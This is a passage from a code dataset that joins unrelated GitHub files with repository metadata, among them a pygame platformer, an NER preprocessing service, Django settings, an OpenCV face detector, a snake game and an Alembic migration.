vertical_movement_collision(self):\n player = self.player.sprite\n player.apply_gravity()\n\n for sprite in self.tiles.sprites():\n if sprite.rect.colliderect(player.rect):\n if player.direction.y > 0:\n player.rect.bottom = sprite.rect.top\n player.direction.y = 0\n elif player.direction.y < 0:\n player.rect.top = sprite.rect.bottom\n player.direction.y = 0\n\n def coin_collect(self):\n player = self.player.sprite\n\n if pygame.sprite.spritecollide(player, self.coins, True):\n self.money_collect_sound.play()\n self.score += 100\n\n def exit_collision(self):\n player = self.player.sprite\n\n if pygame.sprite.spritecollide(player, self.exit, False):\n return True\n return False\n\n def run(self):\n self.tiles.update(self.world_shift)\n self.tiles.draw(self.display_surface)\n\n self.exit.update(self.world_shift)\n self.exit.draw(self.display_surface)\n\n self.coins.draw(self.display_surface)\n\n self.player.update()\n self.horizontal_movement_collision()\n self.vertical_movement_collision()\n self.coin_collect()\n\n self.player.draw(self.display_surface)\n\n if self.exit_collision():\n return False, self.score\n return True, self.score\n\n","repo_name":"GiantOfTheMind/PyGameProject","sub_path":"Level1.py","file_name":"Level1.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25331823456","text":"\"\"\"\nMain configuration file for the application\n\nOn deployment, desired configuration can be overridden by the provision of a local.cfg file\n\"\"\"\n\n##################################################\n# overrides for the webapp deployment\n\nDEBUG = True\n\"\"\"is the web server in debug mode\"\"\"\n\nPORT = 5027\n\"\"\"port to start the webserver on\"\"\"\n\nSSL = False\n\"\"\"support SSL requests\"\"\"\n\nTHREADED = True\n\"\"\"is the web server in threaded mode\"\"\"\n\n############################################\n# important overrides for the ES module\n\n# elasticsearch back-end connection settings\nELASTIC_SEARCH_HOST = \"http://gateway:9200\"\n\"\"\"base url to access elasticsearch\"\"\"\n\nELASTIC_SEARCH_INDEX = \"jper\"\n\"\"\"index name in elasticsearch where our types are stored\"\"\"\n\nELASTIC_SEARCH_VERSION = \"1.5.2\"\n\"\"\"version of elasticsearch which we're using - matters for certain semantics of requests\"\"\"\n\n# Classes from which to retrieve ES mappings to be used in this application\n# (note that if ELASTIC_SEARCH_DEFAULT_MAPPINGS is sufficient, you don't need to\n# add anything here\nELASTIC_SEARCH_MAPPINGS = [\n # \"service.dao.MyDAO\"\n]\n\"\"\"type-specific mappings to be used when initialising - currently there are none\"\"\"\n\n# initialise the index with example documents from each of the types\n# this will initialise each type and auto-create the relevant mappings where\n# example data is provided\nELASTIC_SEARCH_EXAMPLE_DOCS = [\n # \"service.dao.MyDAO\"\n]\n\"\"\"types which have their mappings initialised by example when initialising - currently there are none\"\"\"\n\n############################################\n# important overrides for account module\n\nACCOUNT_ENABLE = False\n\"\"\"Disable user accounts\"\"\"\n\nSECRET_KEY = \"super-secret-key\"\n\"\"\"secret key for session management - only used when accounts are enabled\"\"\"\n\n#############################################\n# important overrides for storage module\n\nSTORE_IMPL = \"octopus.modules.store.store.StoreLocal\"\n\"\"\"implementation class of the main fielstore\"\"\"\n\nSTORE_TMP_IMPL = \"octopus.modules.store.store.TempStore\"\n\"\"\"implementation class of the temporary local filestore\"\"\"\n\nfrom octopus.lib import paths\nSTORE_LOCAL_DIR = paths.rel2abs(__file__, \"..\", \"service\", \"tests\", \"local_store\", \"live\")\n\"\"\"path to local directory for local file store - specified relative to this file\"\"\"\n\nSTORE_TMP_DIR = paths.rel2abs(__file__, \"..\", \"service\", \"tests\", \"local_store\", \"tmp\")\n\"\"\"path to local directory for temp file store - specified relative to this file\"\"\"\n\n\n#############################################\n# Re-try/back-off settings\n\n# from the http layer\n\n# specific to this app\n\n# Minimum amount to leave between attempts to deposit, in the event that there was a semi-permanent error\n# default to 1 hour\nLONG_CYCLE_RETRY_DELAY = 3600\n\"\"\"Delay in between attempts to communicate with a repository that is failing, in seconds\"\"\"\n\n# Maximum number of times to try and deposit before giving up and turning off repository sword submission\n# for a given account\nLONG_CYCLE_RETRY_LIMIT = 24\n\"\"\"Number of re-try attempts against a failing repository before we give up\"\"\"\n\n###############################################\n## Other app-specific settings\n\nDEFAULT_SINCE_DATE = \"1970-01-01T00:00:00Z\"\n\"\"\"The date from which the first request against the JPER API will be made when listing a repository's notifications\"\"\"\n\n# how many seconds in between each run of the script\nRUN_THROTTLE = 2\n\"\"\"delay between executions of the deposit script, in seconds\"\"\"\n\n# whether to store sword response data (receipt, etc). Recommend only to store during testing operation\nSTORE_RESPONSE_DATA = False\n\"\"\"Whether to store response data or not - set to True if testing\"\"\"","repo_name":"JiscPER/jper-sword-out","sub_path":"config/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1417634596","text":"from enums.run_type import RunType\nfrom entities.ner.ne_line import NELine\nfrom enums.language import Language\nfrom entities.ner.ne_collection import NECollection\nimport os\nimport csv\nfrom services.data_service import DataService\nfrom services.file_service import FileService\nfrom services.arguments.ner_arguments_service import NERArgumentsService\nfrom enums.entity_tag_type import EntityTagType\nfrom entities.cache.cache_options import CacheOptions\nfrom typing import Dict, List, Tuple\nimport random\n\nfrom enums.ocr_output_type import OCROutputType\n\nfrom entities.transformers.transformer_entry import TransformerEntry\n\nfrom services.process.process_service_base import ProcessServiceBase\nfrom services.tokenize.base_tokenize_service import BaseTokenizeService\n\nfrom services.vocabulary_service import VocabularyService\nfrom services.cache_service import CacheService\nfrom services.log_service import LogService\nfrom services.string_process_service import StringProcessService\n\n\nclass NERProcessService(ProcessServiceBase):\n def __init__(\n self,\n arguments_service: NERArgumentsService,\n vocabulary_service: VocabularyService,\n file_service: FileService,\n tokenize_service: BaseTokenizeService,\n data_service: DataService,\n cache_service: CacheService,\n string_process_service: StringProcessService):\n self._arguments_service = arguments_service\n self._tokenize_service = tokenize_service\n self._file_service = file_service\n self._data_service = data_service\n self._string_process_service = string_process_service\n\n self._entity_tag_types = arguments_service.entity_tag_types\n\n self.PAD_TOKEN = '[PAD]'\n self.START_TOKEN = '[CLS]'\n self.STOP_TOKEN = '[SEP]'\n\n self.pad_idx = 0\n self.start_idx = 1\n self.stop_idx = 2\n\n challenge_path = file_service.get_challenge_path()\n language_suffix = self._get_language_suffix(arguments_service.language)\n\n train_cache_key = f'train-data-limit-{arguments_service.train_dataset_limit_size}-merge-{arguments_service.merge_subwords}-replacen-{arguments_service.replace_all_numbers}'\n validation_cache_key = f'validation-data-limit-{arguments_service.validation_dataset_limit_size}-merge-{arguments_service.merge_subwords}-replacen-{arguments_service.replace_all_numbers}'\n test_cache_key = f'test-data-merge-{arguments_service.merge_subwords}-replacen-{arguments_service.replace_all_numbers}'\n self._train_ne_collection = cache_service.get_item_from_cache(\n CacheOptions(\n item_key=train_cache_key,\n configuration_specific=False),\n callback_function=lambda: (\n self.preprocess_data(\n os.path.join(\n challenge_path, f'data-train-{language_suffix}.tsv'),\n limit=arguments_service.train_dataset_limit_size)))\n\n self._validation_ne_collection = cache_service.get_item_from_cache(\n CacheOptions(\n item_key=validation_cache_key,\n configuration_specific=False),\n callback_function=lambda: (\n self.preprocess_data(\n os.path.join(\n challenge_path, f'data-dev-{language_suffix}.tsv'),\n limit=arguments_service.validation_dataset_limit_size)))\n\n self._test_ne_collection = cache_service.get_item_from_cache(\n CacheOptions(\n item_key=test_cache_key,\n configuration_specific=False),\n callback_function=lambda: (\n self.preprocess_data(\n os.path.join(\n challenge_path, f'data-test-{language_suffix}.tsv'))))\n\n self._entity_mappings = self._create_entity_mappings(\n self._train_ne_collection,\n self._validation_ne_collection)\n\n vocabulary_cache_key = f'char-vocabulary'\n vocabulary_data = cache_service.get_item_from_cache(\n CacheOptions(item_key=vocabulary_cache_key),\n callback_function=lambda: self._generate_vocabulary_data(language_suffix))\n\n vocabulary_service.initialize_vocabulary_data(vocabulary_data)\n\n def preprocess_data(\n self,\n file_path: str,\n limit: int = None) -> NECollection:\n if not os.path.exists(file_path):\n raise Exception(f'NER File not found at \"{file_path}\"')\n\n collection = NECollection()\n\n with open(file_path, 'r', encoding='utf-8') as tsv_file:\n reader = csv.DictReader(\n tsv_file, dialect=csv.excel_tab, quoting=csv.QUOTE_NONE)\n current_sentence = NELine()\n\n for row in reader:\n if row['TOKEN'] == '':\n continue\n\n is_new_document = row['TOKEN'].startswith('# document')\n is_comment = row['TOKEN'].startswith('#')\n\n document_id = None\n if is_new_document:\n document_id = row['TOKEN'].split('=')[-1].strip()\n\n if len(current_sentence.tokens) == 0:\n current_sentence.document_id = document_id\n\n if is_new_document:\n if len(current_sentence.tokens) > 0:\n current_sentence.tokenize_text(\n self._tokenize_service,\n self._string_process_service,\n replace_all_numbers=self._arguments_service.replace_all_numbers,\n expand_targets=not self._arguments_service.merge_subwords)\n\n collection.add_line(current_sentence)\n\n current_sentence = NELine()\n if document_id is not None:\n current_sentence.document_id = document_id\n\n if limit and len(collection) >= limit:\n break\n elif is_comment:\n continue\n else:\n current_sentence.add_data(self._string_process_service, row, self._entity_tag_types)\n\n # add last document\n if len(current_sentence.tokens) > 0:\n current_sentence.tokenize_text(\n self._tokenize_service,\n self._string_process_service,\n replace_all_numbers=self._arguments_service.replace_all_numbers,\n expand_targets=not self._arguments_service.merge_subwords)\n\n collection.add_line(current_sentence)\n\n return collection\n\n def get_processed_data(self, run_type: RunType):\n if run_type == RunType.Train:\n return self._train_ne_collection\n elif run_type == RunType.Validation:\n return self._validation_ne_collection\n elif run_type == RunType.Test:\n if not self._arguments_service.evaluate:\n raise Exception(\n 'You must have an evaluation run to use test collection')\n return self._test_ne_collection\n\n raise Exception('Unsupported run type')\n\n def get_main_entities(self, entity_tag_type: EntityTagType) -> set:\n entity_mapping_keys = [\n key for key, value in self._entity_mappings[entity_tag_type].items() if value >= 4]\n entities = set([x[2:] for x in entity_mapping_keys if x[2:] != ''])\n return entities\n\n def get_labels_amount(self) -> Dict[EntityTagType, int]:\n result = {\n entity_tag_type: len(entity_mapping) for entity_tag_type, entity_mapping in self._entity_mappings.items()\n }\n\n return result\n\n def get_entity_labels(self, ne_line: NELine, ignore_unknown: bool = False) -> List[int]:\n labels = {\n entity_tag_type: None for entity_tag_type in self._entity_tag_types\n }\n\n for entity_tag_type in self._entity_tag_types:\n current_entity_tags = ne_line.get_entity_tags(entity_tag_type)\n labels[entity_tag_type] = [\n self.get_entity_label(entity, entity_tag_type, ignore_unknown=ignore_unknown) for entity in current_entity_tags\n ]\n\n return labels\n\n def get_entity_label(self, entity_tag: str, entity_tag_type: EntityTagType, ignore_unknown: bool = False) -> int:\n if entity_tag_type not in self._entity_mappings.keys():\n raise Exception(f'Invalid entity tag type - \"{entity_tag_type}\"')\n\n if entity_tag not in self._entity_mappings[entity_tag_type].keys():\n if ignore_unknown:\n return self._entity_mappings[entity_tag_type]['O']\n\n raise Exception(f'Invalid entity tag - \"{entity_tag}\"')\n\n return self._entity_mappings[entity_tag_type][entity_tag]\n\n def get_entity_by_label(self, label: int, entity_tag_type: EntityTagType, ignore_unknown: bool = False) -> str:\n if entity_tag_type not in self._entity_mappings.keys():\n raise Exception('Invalid entity tag type')\n\n for entity, entity_label in self._entity_mappings[entity_tag_type].items():\n if label == entity_label:\n return entity\n\n if ignore_unknown:\n return 'O'\n\n raise Exception('Entity not found for this label')\n\n def _create_entity_mappings(\n self,\n train_ne_collection: NECollection,\n validation_ne_collection: NECollection) -> Dict[EntityTagType, Dict[str, int]]:\n\n entity_mappings = {\n entity_tag_type: None for entity_tag_type in self._entity_tag_types\n }\n\n for entity_tag_type in self._entity_tag_types:\n entities = train_ne_collection.get_unique_entity_tags(\n entity_tag_type)\n entities.extend(\n validation_ne_collection.get_unique_entity_tags(entity_tag_type))\n entities = list(set(entities))\n entities.sort(key=lambda x: '' if x is None else x)\n entity_mapping = {x: i+3 for i, x in enumerate(entities)}\n entity_mapping[self.PAD_TOKEN] = self.pad_idx\n entity_mapping[self.START_TOKEN] = self.start_idx\n entity_mapping[self.STOP_TOKEN] = self.stop_idx\n\n entity_mappings[entity_tag_type] = entity_mapping\n\n return entity_mappings\n\n def _generate_vocabulary_data(self, language_suffix: str):\n unique_characters = set()\n\n for ne_line in self._train_ne_collection.lines:\n current_unique_characters = set(\n [char for token in ne_line.tokens for char in token])\n unique_characters = unique_characters.union(\n current_unique_characters)\n\n for ne_line in self._validation_ne_collection.lines:\n current_unique_characters = set(\n [char for token in ne_line.tokens for char in token])\n unique_characters = unique_characters.union(\n current_unique_characters)\n\n unique_characters = sorted(list(unique_characters))\n unique_characters.insert(0, '[PAD]')\n unique_characters.insert(1, '[UNK]')\n unique_characters.insert(2, '[CLS]')\n unique_characters.insert(3, '[EOS]')\n\n int2char = dict(enumerate(unique_characters))\n char2int = {char: index for index, char in int2char.items()}\n vocabulary_data = {\n 'characters-set': unique_characters,\n 'id2token': int2char,\n 'token2id': char2int\n }\n\n return vocabulary_data\n\n def _get_language_suffix(self, language: Language):\n if language == Language.Dutch:\n return 'nl'\n else:\n raise Exception('Unsupported language')\n","repo_name":"budh333/UnSilence_VOC","sub_path":"src/services/process/ner_process_service.py","file_name":"ner_process_service.py","file_ext":"py","file_size_in_byte":11770,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"21012358650","text":"from .base import *\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = \"django-insecure-bj+(xr*n5rk@(0))ntjfe*y63*rpacb7@rw2x6li9f@ryhlzk6\"\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = [\"localhost\", \"127.0.0.1\"]\n\n\nINSTALLED_APPS += [\"livereload\"]\n\nMIDDLEWARE += [\n \"livereload.middleware.LiveReloadScript\",\n # 'debug_toolbar.middleware.DebugToolbarMiddleware',\n]\n\n\n# Database\n# https://docs.djangoproject.com/en/3.2/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": BASE_DIR / \"db.sqlite3.debug\",\n }\n}\n","repo_name":"biplovsubedi/customfpl","sub_path":"customfpl/customfpl/settings/develop.py","file_name":"develop.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"437909787","text":"'''\nCreate a Python program that will capture and display a person's grocery shopping list.\nMake it so the programwill continually prompt the user for another item until the point where they enter a blank item. After all the items\nhave been entered, try displaying the shopping list back to the user.\n'''\n\n\ngrocery_list = []\nfinished = False\n\nwhile not finished:\n\titem = input(\"Enter an item for your grocery list. Press when done : \")\n\n\tif len(item) == 0:\n\t\tfinished = True\n\telse:\n\t\tgrocery_list.append(item)\n\t\tprint(\"Item has been added\")\n\nprint()\nprint(\"Your Grocery List\")\nprint(\"-\" * 18)\nfor item in grocery_list:\n\tprint(item)\n\n\n\n","repo_name":"F4Francisco/Python_Succinctly","sub_path":"Chapter5_List/Grocery_List.py","file_name":"Grocery_List.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74942111271","text":"import numpy as np\nfrom Overlap import dC_dAngle\nimport matplotlib.pyplot as plt\n\noverlap_start = 40 * 10 ** -6\noverlap_stop = 80 * 10 ** -6\nthickness = 25 * 10 ** -6\nnon_overlap_start = 5 * 10 ** -6\nnon_overlap_stop = 20 * 10 ** -6\noverlap_range = np.arange(overlap_start, overlap_stop, 5 * 10 ** -6)\nnon_overlap_range = np.arange(non_overlap_start, non_overlap_stop, 5 * 10 ** -6)\nvoltage = 80\nj = 68.75 * 10 ** -6 # final non-overlapping length\n\nfor i in overlap_range:\n T = abs(160*((voltage ** 2) * dC_dAngle(i + j, thickness, j, 0.75, 1000, 3.5 * 10 ** -6)))\n angles = np.linspace(0, 0.75, 999)\n # plt.axhline(y=4*10**-9, color='r', linestyle='-')\n plt.axvline(x=0.19, color='r', linestyle='-')\n #plt.axvline(x=-0.19, color='r', linestyle='-')\n plt.plot(angles, T, label=f'OL: {round(i*10**6,2)} \\u03BCm')\n plt.pause(0.1)\nplt.xlabel(\"angle (rad)\")\nplt.ylabel(\"Moment (Nm)\")\nplt.legend()\nplt.show()\n","repo_name":"jasperverduijn/MEMS-group10","sub_path":"Quick_and_dirty.py","file_name":"Quick_and_dirty.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11223628881","text":"from turtle import Screen\r\nfrom Snake import Snake\r\nfrom food import Food\r\nimport time\r\nfrom scoreboard import Scoreboard\r\nscreen = Screen()\r\nscreen.setup(600, 600)\r\nscreen.bgcolor(\"black\")\r\nscreen.title(\"Snake\")\r\nscreen.tracer(0)\r\n\r\nsnake = Snake()\r\nfood = Food()\r\nscore = Scoreboard()\r\nscreen.update()\r\n\r\nscreen.listen()\r\n\r\nscreen.onkey(snake.move_up, \"Up\")\r\nscreen.onkey(snake.move_left, \"Left\")\r\nscreen.onkey(snake.move_down, \"Down\")\r\nscreen.onkey(snake.move_right, \"Right\")\r\n\r\ngame_is_on = True\r\nwhile game_is_on:\r\n screen.update()\r\n time.sleep(.1)\r\n snake.move()\r\n if snake.head.distance(food) <= 15:\r\n food.regenerate()\r\n score.update_score()\r\n snake.increase_size()\r\n\r\n if snake.head.xcor() > 290 or snake.head.xcor() < -290 or snake.head.ycor() > 290 or snake.head.ycor() < -290:\r\n game_is_on = False\r\n score.game_over()\r\n if snake.collision():\r\n game_is_on = False\r\n score.game_over()\r\n\r\nscreen.exitonclick()\r\n","repo_name":"mjtamima/classic-snake-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22752775111","text":"# OpenCV-Python is a Python library designed to solve computer vision problems.\n# pip install opencv-python and import the library\nimport cv2\n\n\ndef identify_faces_in_img(imageName: str) -> None:\n \"\"\"Function that identifies faces in an image.\n @param imageName: a string representing the name of the image to process.\n Image with the same name must be placed first in '/01-images/' directory.\n \"\"\"\n\n # Cascading classifiers are trained with several hundred \"positive\" sample views of a particular object and arbitrary \"negative\" images of the same size. After the classifier is trained it can be applied to an image and detect the object in question.\n # Haar Cascade is a machine learning object detection algorithm proposed by Paul Viola and Michael Jones\n # Create the haar cascade that detects frontal faces\n faceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\n # Read the image\n # imageName = \"img.jpg\" # Hardcoded\n # imageName = __import__(\"sys\").argv[1] # From SysArgs\n image = cv2.imread(f\"..\\\\01-images\\\\{imageName}\\\\\")\n\n # Show the original image\n print(\"Showing original image..\")\n cv2.imshow(\"Original Image\", image)\n cv2.waitKey()\n\n # Convert the image to Grayscale (8-bit, shades of gray image)\n # The reason for this is that gray channel is easy to process and is computationally less intensive as it contains only 1-channel of black-white.\n grayImage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Show the gray image\n print(\"Showing gray image..\")\n cv2.imshow(\"Gray Image\", grayImage)\n cv2.waitKey()\n\n # Detect faces in the gray image\n faces = faceCascade.detectMultiScale(grayImage)\n\n # Print the total number of detected faces and the coordinates of each\n print(f\"Number of detected faces: {len(faces)}\")\n print(\"Faces coordinates:\")\n index: int = 0\n for face in faces:\n index += 1\n print(f\"- Face {index}: {face}\")\n\n # Draw a rectangle around each face (on the original image, not the gray one)\n for (x, y, w, h) in faces:\n # Function accepts img, pt1, pt2, color (in BGR not RGB), thickness\n # pt1 and pt2 are the corners of the rectangle\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 0, 255), 2)\n # Red color is (255, 0, 0) in RGB\n\n if(len(faces)):\n print(\"Showing original image after drawing rectangles..\")\n # Save the image after drawing\n imgLoc: str = f\"..\\\\02-edited-images\\\\{imageName}\"\n print(f\"Image saved in {imgLoc}\")\n cv2.imwrite(imgLoc, image)\n else:\n print(\"No face is detected.\")\n\n # Show the original image after processing\n cv2.imshow(f\"Final Image (Number of detected faces: {len(faces)})\", image)\n cv2.waitKey()\n\n\nif __name__ == \"__main__\":\n imageName: str = __import__(\"sys\").argv[1] # From Args\n # try:\n identify_faces_in_img(imageName)\n # except:\n # print(\"Error occured ! Image is most likely unavailable.\")\n","repo_name":"THammami01/face-recognition-unified","sub_path":"operations/identify_faces_in_img.py","file_name":"identify_faces_in_img.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39492359878","text":"import codecs\nimport os\n\nimport ru_core_news_md\n\nnlp = ru_core_news_md.load()\n\npages = os.listdir('pages')\nprint(pages)\n\nfor page in pages:\n text = codecs.open('pages/' + page, encoding='utf-8', mode='r').read()\n document = nlp(text)\n with open('lemm/' + page, 'w', encoding='utf8') as out:\n for token in document:\n # Get the lemma for each token\n out.write(token.lemma_.lower())\n # Insert white space between each token\n out.write(' ')\n","repo_name":"oas1s/poisk","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37786313459","text":"import pigpio\nimport time\n\nPWM_CONTROL_PIN = 18\nPWM_FREQ = 50\nSTEP = 15\n\npi = pigpio.pi()\n\ndef angle_to_duty_cycle(angle=0):\n duty_cycle = int(500 * PWM_FREQ + (1900 * PWM_FREQ * angle / 180))\n return duty_cycle\n\ntry:\n print('按下 Ctrl-C 可停止程式')\n for angle in range(0, 181, STEP):\n dc = angle_to_duty_cycle(angle)\n print('角度={: >3}, 工作週期={: >6}'.format(angle, dc))\n pi.hardware_PWM(PWM_CONTROL_PIN, PWM_FREQ, dc)\n time.sleep(2)\n for angle in range(180, -1, -STEP):\n dc = angle_to_duty_cycle(angle)\n print('角度={: >3}, 工作週期={: >6}'.format(angle, dc))\n pi.hardware_PWM(PWM_CONTROL_PIN, PWM_FREQ, dc)\n time.sleep(2)\n pi.hardware_PWM(PWM_CONTROL_PIN, PWM_FREQ, angle_to_duty_cycle(90))\n while True:\n next\nexcept KeyboardInterrupt:\n print('關閉程式')\nfinally:\n pi.set_mode(PWM_CONTROL_PIN, pigpio.INPUT)","repo_name":"ss203242430/schoolProject","sub_path":"robotScript/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16176015624","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# My math functions\ndef linearfunc2(x, **kwargs):\n a= kwargs[\"a\"]\n b = kwargs[\"b\"]\n y = a * x + b\n return y\n\ndef parabole2(x, **kwargs):\n a= kwargs[\"a\"]\n y = x ** 2 + a\n return y\n\ndef sin(x, **kwargs):\n a = kwargs[\"a\"]\n b = kwargs[\"b\"]\n c = kwargs[\"c\"]\n y = a*np.sin(x*b)+c\n return y\n\n\n# Generalized math functions\ndef generalFunc(func, x, **kwargs):\n return func(x, **kwargs)\n\n\n# Tangent line calc and plot\ndef calc_plot_derv(p, x, derv_a, derv_b):\n\n z=2\n c = (z**2/(1+derv_a[p]**2))**0.5\n c = c/2\n print(c)\n\n\n arr = np.arange(x[p]-3, x[p]+3, 0.1)\n new_y = derv_a[p] * arr + derv_b[p]\n plt.plot(arr, new_y)\n\n\n# Tangent line calc and plot + func plot\ndef plotAll(p, x, derv_a, derv_b, func, **kwargs):\n plt.plot(x, generalFunc(func, x, **kwargs))\n calc_plot_derv(p, x, derv_a, derv_b)\n plt.show()\n\n# Main function\ndef myDerv(funcToUse, p, x ,dx=0.0001, **kwargs):\n\n\n y_x_dx = generalFunc(funcToUse, (x + dx), **kwargs) # f(x+dx)\n y_x = generalFunc(funcToUse, (x), **kwargs) # f(x)\n\n # Slope: a=(f(x+dx)-f(x))/dx Intercept: b= y- a*x\n derv_a = (y_x_dx - y_x) / dx # a of tangent at each point\n derv_b = y_x - derv_a * x # b of tangent at each point\n\n # Convert point to index and plot\n itemindex = np.where(np.round(x, 3) == p)\n plotAll(itemindex[0][0], x, derv_a, derv_b, funcToUse, **kwargs)\n\n\n\n\n\n# Code\n# Plot x data\nx = np.arange(-10, 10, 0.1)\n\n# farams\na = 2 # if linear function\nb = 5 # if linear and parabolic\nc = 3\ndx = 0.000000000001 # dx\np = 7\n\nd={1:sin,\n 2:parabole2,\n 3:linearfunc2,\n 4:sin\n }\n\nfunc = d[2]\nsomeNewFunc = (lambda x, **a: x**3-5*x)\n\nmyDerv(someNewFunc, p, x, dx, a = a, b = b, c = c)\n\n\n","repo_name":"royassis/derivativePlotter","sub_path":"main_but_w_kwargs.py","file_name":"main_but_w_kwargs.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41458120509","text":"#\n# @lc app=leetcode id=684 lang=python3\n#\n# [684] Redundant Connection\n#\n\n# @lc code=start\nfrom collections import defaultdict\n\n\nclass Solution:\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n\n roots = dict()\n rank = dict()\n\n for i, j in edges:\n roots[i] = i\n roots[j] = j\n rank[i] = 1\n rank[j] = 1\n\n def find(a):\n # step is 1, a = a's root, root[a] = root of root of a\n\n # while roots[a] !=a:\n # temp = roots[a]\n # roots[a] = roots[roots[a]]\n # a=temp\n # return a\n\n #####\n # 2023 revision\n if roots[a] != a:\n roots[a] = find(roots[a])\n\n return roots[a]\n #####\n \n\n\n\n while roots[a] != a:\n # step is 2, previous method has step = 1, a = root of a's root\n # regradless what step is, the answer stays constant once\n # roots[a] == a, so this is correct and faster\n # root[a] != a\n # so a's root = root[ a's root -> root[a]] \n temp = roots[roots[a]]\n roots[a] = temp # step is 1\n a = temp # step is 2\n\n # short but it's the same\n\n # roots[a] = roots[roots[a]]\n # a = roots[a]\n return a\n\n for i, j in edges:\n\n pi, pj = find(i), find(j)\n\n if pi == pj:\n return [i, j]\n\n elif rank[pi] > rank[pj]:\n roots[pj] = pi\n elif rank[pi] < rank[pj]:\n roots[pi] = pj\n\n else:\n roots[pj] = roots[pi]\n rank[pi] += 1\n\n return []\n\n\n# @lc code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/684.redundant-connection.py","file_name":"684.redundant-connection.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12860786996","text":"# boj 2164 카드2 s4\n# noj.am/2164\nfrom collections import deque\n\nN = int(input())\ncard = deque(i for i in range(1, N+1)) # 덱으로 카드 설정\n\nwhile len(card) > 1: # 1장 남을때까지\n card.popleft() # 맨 앞 deque\n card.rotate(-1) # 맨 앞 카드를 맨뒤로 이동\n\nprint(card[0]) # deque의 첫번째 원소\n","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/BOJ/2164_카드2_s4/2164.py","file_name":"2164.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74151413034","text":"\"\"\"adds alias table\n\nRevision ID: a016a16f2341\nRevises: d34ba7ae70bb\nCreate Date: 2021-12-27 06:02:27.971079\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"a016a16f2341\"\ndown_revision = \"d34ba7ae70bb\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"alias\",\n sa.Column(\"id\", sa.BigInteger(), nullable=False),\n sa.Column(\n \"created_at\",\n sa.DateTime(),\n server_default=sa.text(\"(now() at time zone 'utc')\"),\n nullable=False,\n ),\n sa.Column(\n \"updated_at\",\n sa.DateTime(),\n server_default=sa.text(\"(now() at time zone 'utc')\"),\n nullable=True,\n ),\n sa.Column(\"distinct_person_id\", sa.Text(), nullable=False),\n sa.Column(\"visitor_uuid\", sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f('ix_alias_distinct_person_id'), 'alias', ['distinct_person_id'], unique=False)\n op.create_index(op.f('ix_alias_visitor_uuid'), 'alias', ['visitor_uuid'], unique=False)\n\n\ndef downgrade():\n op.drop_index(op.f('ix_alias_visitor_uuid'), table_name='alias')\n op.drop_index(op.f('ix_alias_distinct_person_id'), table_name='alias')\n op.drop_table(\"alias\")\n","repo_name":"bflannery/magic-pixel","sub_path":"event-tracker/migrations/versions/a016a16f2341_adds_alias_table.py","file_name":"a016a16f2341_adds_alias_table.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12494573180","text":"from django.db import models as _m\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Semester(_m.IntegerChoices):\n FIRST = 1, _(\"1-st\")\n SECOND = 2, _(\"2-nd\")\n THIRD = 3, _(\"3-rd\")\n FORTH = 4, _(\"4-th\")\n FIFTH = 5, _('5-th')\n SIXTH = 6, _('6-th')\n SEVENTH = 7, _('7-th')\n EIGHTH = 8, _('8-th')\n NINTH = 9, _('9-th')\n TENTH = 10, _(\"10-th\")\n\n\nclass Degree(_m.TextChoices):\n BACHELORS = \"BS\", _(\"Bachelor's Degree\")\n MASTERS = \"MS\", _(\"Master's Degree\")\n PHD = \"PHD\", _(\"PhD\")\n DIPLOMA = \"DPL\", 